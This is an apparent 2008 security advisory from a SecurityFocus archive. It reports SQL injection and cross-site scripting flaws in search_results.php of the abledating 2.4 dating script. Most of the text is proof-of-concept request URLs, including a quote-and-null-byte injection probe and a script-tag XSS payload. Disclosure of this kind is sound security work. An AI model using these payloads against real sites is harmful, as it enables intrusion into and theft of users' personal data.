abledating 2.4 >> Sql injection and cross site scripting on search_results.php May 22 2008 05:00PM
a jasbi yahoo com
By : Ali Jasbi ( hackerz.ir security & hacking team)

vendor : abk-soft.com

product name : abledating 2.4

Exploits :

1- Sql injection :

bug :

http://abledating//search_results.php?p_age_from=18&p_age_to=18&keyword=
[sql injection]&status=online&save_search=on&search_name=My%20search&photo=on
&p_orientation%255B%255D=2&order=rating&sort=desc&p_relation%255B%255D=4
&search

test :

http://abledating/search_results.php?p_age_from=18&p_age_to=18&keyword=%
00'&status=online&save_search=on&search_name=My%20search&photo=on&p_orie
ntation%255B%255D=2&order=rating&sort=desc&p_relation%255B%255D=4&search

2-Cross site scripting :

bug :

http://abledating/search_results.php?p_orientation%5B%5D=2&p_age_from=18
&p_age_to=18&p_relation%5B%5D=on&keyword=>'><ScRiPt%20%0a%0d>alert(42119
.7535489005)%3B</ScRiPt>&status=online&save_search=on&search_name=My%20s
earch&photo=on

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus